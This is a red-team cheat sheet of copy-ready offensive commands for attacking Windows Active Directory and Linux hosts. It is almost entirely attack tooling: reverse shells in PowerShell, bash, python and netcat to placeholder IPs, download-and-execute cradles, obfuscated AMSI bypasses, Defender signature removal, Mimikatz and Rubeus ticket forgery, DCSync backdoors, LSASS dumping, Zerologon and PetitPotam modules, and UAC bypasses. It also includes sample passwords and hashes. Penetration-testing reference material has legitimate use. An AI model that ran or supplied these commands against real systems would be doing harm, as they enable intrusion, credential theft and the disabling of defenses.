Pentest-Redteam-Helpful-commands.md

Process

1) Nessus

Start nessus running against all in scope hosts

Check out-of-scope hosts and make sure they're not scanned!

2) Nmap Scans

Full TCP

nmap -sC -sV -Pn -vv -p- -oA full-tcp-nmap -iL hosts

UDP

nmap -sC -sV -Pn -vv --top-ports 100 -oA udp-top-100 -iL hosts

3) Metasploit

Setting up listener

use exploit/multi/handler
set PAYLOAD 
set EXITFUNC 

Socks Proxy

use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
run

Autoroute

use post/multi/manage/autoroute
set SESSION <id>
set SUBNET <SUBNET>
set NETMASK <NETMASK>
show options
run
route

Execute DotNet Assembly - Seatbelt Example

use post/windows/manage/execute_dotnet_assembly
set DOTNET_EXE /mnt/share/seatbelt.exe
set ARGUMENTS -group=all
set session <number>
run

5) Initial Enumeration

Powerview

# Get all users in the current domain
Get-DomainUser | select -ExpandProperty cn

# Get all computers in the current domain
Get-DomainComputer

# Get all domains in current forest
Get-ForestDomain

# Get domain/forest trusts
Get-DomainTrust
Get-ForestTrust

# Get information for the DA group
Get-DomainGroup "Domain Admins"

# Find members of the DA group
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername

# Find interesting shares in the domain, ignore default shares, and check access
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess

# Get OUs for current domain
Get-DomainOU -FullData

# Get computers in an OU
# %{} is a looping statement
Get-DomainOU -name Servers | %{ Get-DomainComputer -SearchBase $_.distinguishedname } | select dnshostname

# Get GPOs applied to a specific OU
Get-DomainOU *WS* | select gplink
Get-DomainGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"

# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domain
Get-DomainGPOLocalGroup -ResolveMembersToSIDs | select GPODisplayName, GroupName, GroupMemberOf, GroupMembers

# Get the computers where users are part of a local group through a GPO restricted group
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

# Find principals that can create new GPOs in the domain
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=targetdomain,DC=com" -ResolveGUIDs | ?{ $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier

# Find principals that can link GPOs to OUs
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier

# Get incoming ACL for a specific object
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights

# Find interesting ACLs for the entire domain, show in a readable (left-to-right) format
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

# Get interesting outgoing ACLs for a specific user or group
# ?{} is a filter statement
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights

Disable Restricted Admin (ADMIN NEEDED) for RDP Access

reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0

Add DCsync Rights to Specific User

Add-ObjectACL -TargetDistinguishedName "dc=targetdomain,dc=com" -PrincipalSamAccountName BackdoorUser -Rights DCSync

Lateral Movement

# Find existing local admin access for user (noisy 🚩)
Find-LocalAdminAccess

# Hunt for sessions of interesting users on machines where you have access (also noisy 🚩)
Find-DomainUserLocation -CheckAccess | ?{$_.LocalAdmin -Eq True }

# Look for kerberoastable users
Get-DomainUser -SPN | select name,serviceprincipalname

# Look for AS-REP roastable users
Get-DomainUser -PreauthNotRequired | select name

# Look for interesting ACL within the domain, filtering on a specific user or group you have compromised
## Exploitation depends on the identified ACL, some techniques are discussed in this cheat sheet
## Example for GenericWrite on user: Disable preauth or add SPN for targeted kerberoast (see below)
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "UserOrGroupToQuery"}

# Look for servers with Unconstrained Delegation enabled
## If available and you have admin privs on this server, get user TGT (see below)
Get-DomainComputer -Unconstrained

# Look for users or computers with Constrained Delegation enabled
## If available and you have user/computer hash, access service machine as DA (see below)
Get-DomainUser -TrustedToAuth | select userprincipalname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto

Applocker Policy Powerview

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Get-AppLockerPolicy -Domain -LDAP "LDAP://targetdomain.com/CN={16641EA1-8DD3-4B33-A17F-9F259805B8FF},CN=Policies,CN=System,DC=targetdomain,DC=com"  | select -expandproperty RuleCollections

Generic Windows

sysinfo

Enable Powershell Remoting

wget https://raw.githubusercontent.com/samratashok/nishang/master/Backdoors/Set-RemotePSRemoting.ps1 -O psremote.ps1

# Give user PowerShell Remoting access to a machine
Set-RemotePSRemoting -UserName BackdoorUser -ComputerName dc.targetdomain.com

Meterpreter Generating Shells

X86 shell

sudo msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.49.65 LPORT=443 EXITFUNC=thread -f csharp

x64 Reverse Shell

sudo msfvenom -p windows/x64/meterpreter/reverse_https -a x64 LHOST=10.10.10.4 LPORT=443 EXITFUNC=thread -f ps1

RPCCLIENT

Authenticated

rpcclient -U "<domain>\<username>" <IP>

Anonymous

rpcclient -N -U "" <IP>

GetDomainSID Anon

rpcclient $> lsaquery

Impacket

WMI Exec

# with password
impacket-wmiexec DOMAIN/targetuser:[email protected]

# with hash
impacket-wmiexec DOMAIN/[email protected] -hashes :e0e223d63905f5a7796fb1006e7dc594

# with Kerberos authentication (make sure your client is setup to use the right ticket, and that you have a TGS with the right SPNs)
impacket-wmiexec DOMAIN/[email protected] -no-pass -k

KERBEROAST

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

GetTGT

# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]

# If not provided, password is asked

# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Golden Ticket

# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# To generate the TGT with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Mimikatz

Generate Golden Ticket

Kerberos::golden /user:Administrator /service:krbtgt /domain:currentdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /target:targetdomain.com /rc4:fe8884bf222153ca57468996c9b348e9 /ticket:ticket.kirbi

Pass The Ticket

# Collect tickets

sekurlsa::tickets /export

# Inject ticket

kerberos::ptt <.kirbi file>

# spawn CMD with the injected ticket

misc::cmd

Bloodhound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# Run all checks, including restricted groups enforced through the domain  🚩
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup

# Running LoggedOn separately sometimes gives you more sessions, but enumerates by looping through hosts so is VERY noisy 🚩
Invoke-BloodHound -CollectionMethod LoggedOn

CrackMapExec

Credential Spray List of Targets

poetry run crackmapexec smb /home/kali/Documents/Training/OSEP/OSEP_Exam/targets.txt -u username -p password

WinRM Run Command

poetry run crackmapexec winrm 172.16.65.92 -u jim -p fSgdaws536Dfa -x "powershell -exec bypass -enc

Dump LSASS Remotely

poetry run crackmapexec smb -u -p –lsa

NoPAC

poetry run crackmapexec smb <IP> -u '' -p '' -M nopac

ioxidresolver - Get IPv4 and IPv6

poetry run crackmapexec smb <IP> -u '' -p '' -M ioxidresolver

PetitPotam

poetry run crackmapexec smb <IP> -u '' -p '' -M petitpotam

Zerologon

poetry run crackmapexec smb <IP> -u '' -p '' -M zerologon

SharpKatz

DCSync By Username

SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc

LSASSY

Dump LSASS Remotely

lsassy -d test.lab -u -p

PyPykatz

pypykatz live lsa --method handledup

Rubeus

# Request a TGT as the target user and pass it into the current session
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt

# More stealthy variant, but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)
.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256KEY] /opsec /ptt

# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe

.\Rubeus.exe asktgs /ticket:c:\ad\tools\eucorp-tgt.kirbi /service:CIFS/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

PTT

# Collect tickets

.\Rubeus.exe dump

# Inject ticket

.\Rubeus.exe ptt /ticket:<.kirbi file>

TGT

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd

Kerbrute

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

SharpGPOAbuse.exe --AddComputerTask --TaskName "Microsoft LEGITIMATE Hotfix" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c start calc.exe" --GPOName "Totally Legit GPO"

Powershell

Convert to Encoded Command Linux

echo "iex(command)" | iconv --to-code UTF-16LE | base64 -w 0

Powershell Load Remote Script

powershell IEX(New-Object Net.WebClient).DownloadString('http://<IPAddress>:<Port>/PowershellScript.ps1')

Non-Proxy Aware Load Script

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.16.7/PowerView.obs.ps1',$false);$h.send();iex $h.responseText

Powershell Encoded Command

$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.65/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText

`

Run Encoded Command

powershell -exec bypass -enc 

Reverse TCP Shell one line

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Reverse TCP one line

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Defender Remove Signatures

MpCmdRun.exe -RemoveDefinitions -All

AMSI Bypass

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)

Load C# Assembly Reflectively

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main()

# Download and run Rubeus, with arguments (make sure to split the args)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())

# Execute a specific method from an assembly (e.g. a DLL)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

Constrained Language Mode

$ExecutionContext.SessionState.LanguageMode

&{whoami}

Identify LAPS

https://github.com/leoloobeek/LAPSToolkit/blob/master/LAPSToolkit.ps1

# Get computers running LAPS, along with their passwords if we're allowed to read those
Get-LAPSComputers

# Get groups allowed to read LAPS passwords
Find-LAPSDelegatedGroups

Powershell Port Scanner

Single Threaded

# Define the target IP/hostname and ports to scan
$Target = "192.168.1.1"  # Replace with the target IP or hostname
$Ports = 1..1024         # Ports to scan (adjust as needed)

# Function to check if a port is open
function Test-Port {
    param (
        [string]$Target,
        [int]$Port
    )
    try {
        $TcpClient = New-Object System.Net.Sockets.TcpClient
        $TcpClient.Connect($Target, $Port)
        $TcpClient.Close()
        return $true
    } catch {
        return $false
    }
}

# Scan the ports
foreach ($Port in $Ports) {
    if (Test-Port -Target $Target -Port $Port) {
        Write-Host "Port $Port is open" -ForegroundColor Green
    } else {
        Write-Host "Port $Port is closed" -ForegroundColor Red
    }
}

Multi Threaded

# Define the target IP/hostname and ports to scan
$Target = "127.0.0.1"  # Replace with the target IP or hostname
$Ports = 1..1024         # Ports to scan (adjust as needed)
$MaxThreads = 50         # Number of threads to run in parallel

# Create a RunspacePool to handle parallel execution
$RunspacePool = [runspacefactory]::CreateRunspacePool(1, $MaxThreads)
$RunspacePool.Open()

# Collection to store runspaces
$Runspaces = @()

# Function to check if a port is open
foreach ($Port in $Ports) {
    $Runspace = [powershell]::Create().AddScript({
        param ($Target, $Port)
        try {
            $TcpClient = New-Object System.Net.Sockets.TcpClient
            $TcpClient.Connect($Target, $Port)
            $TcpClient.Close()
            Write-Output "Port $Port is open"
        } catch {
            # Uncomment the next line if you want to see closed ports
            #Write-Output "Port $Port is closed"
        }
    }).AddArgument($Target).AddArgument($Port)
    
    $Runspace.RunspacePool = $RunspacePool
    $Runspaces += [PSCustomObject]@{
        Pipe   = $Runspace
        Status = $Runspace.BeginInvoke()
    }
}

# Wait for all threads to complete
$Runspaces | ForEach-Object {
    $_.Pipe.EndInvoke($_.Status)
    $_.Pipe.Dispose()
}

# Close the RunspacePool
$RunspacePool.Close()
$RunspacePool.Dispose()

C# in Powershell Multi-Threaded Green Open Ports

# C# code for multi-threaded port scanner
Add-Type -TypeDefinition @"
using System;
using System.Net.Sockets;
using System.Threading;

public class PortScanner {
    public static void Scan(string target, int startPort, int endPort, int maxThreads) {
        SemaphoreSlim semaphore = new SemaphoreSlim(maxThreads);
        for (int port = startPort; port <= endPort; port++) {
            semaphore.Wait();
            int currentPort = port; // Avoid closure issue
            ThreadPool.QueueUserWorkItem((state) => {
                try {
                    using (TcpClient client = new TcpClient()) {
                        client.Connect(target, currentPort);
                        Console.ForegroundColor = ConsoleColor.Green;
                        Console.WriteLine("Port " + currentPort + " is open");
                        Console.ResetColor();
                    }
                } catch {
                   //Console.ForegroundColor = ConsoleColor.Red;
                   //Console.WriteLine("Port " + currentPort + " is closed");
                   //Console.ResetColor();
                } finally {
                    semaphore.Release();
                }
            });
        }
        // Wait for all threads to finish
        while (semaphore.CurrentCount < maxThreads) {
            Thread.Sleep(100);
        }
    }
}
"@

# Define the target and port range
$Target = "127.0.0.1"  # Replace with your target IP or hostname
$StartPort = 1           # Starting port
$EndPort = 1024          # Ending port
$MaxThreads = 50         # Maximum number of threads

# Run the port scanner
[PortScanner]::Scan($Target, $StartPort, $EndPort, $MaxThreads)

Linux Reverse Shell

Bash

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Python ipv4

export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Python IPv6

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Netcat Linux

nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242

UAC Bypass

SharpBypassUAC

# Generate EncodedCommand
echo -n 'cmd /c start rundll32 c:\\users\\public\\beacon.dll,Update' | base64

# Use SharpBypassUAC e.g. from a CobaltStrike beacon
execute-assembly /opt/SharpBypassUAC/SharpBypassUAC.exe -b eventvwr -e Y21kIC9jIHN0YXJ0IHJ1bmRsbDMyIGM6XHVzZXJzXHB1YmxpY1xiZWFjb24uZGxsLFVwZGF0ZQ==

Fodhelper

# The command to execute in high integrity context
$cmd = "cmd /c start powershell.exe"
 
# Set the registry values
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $cmd -Force
 
# Trigger fodhelper to perform the bypass
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
 
# Clean registry
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force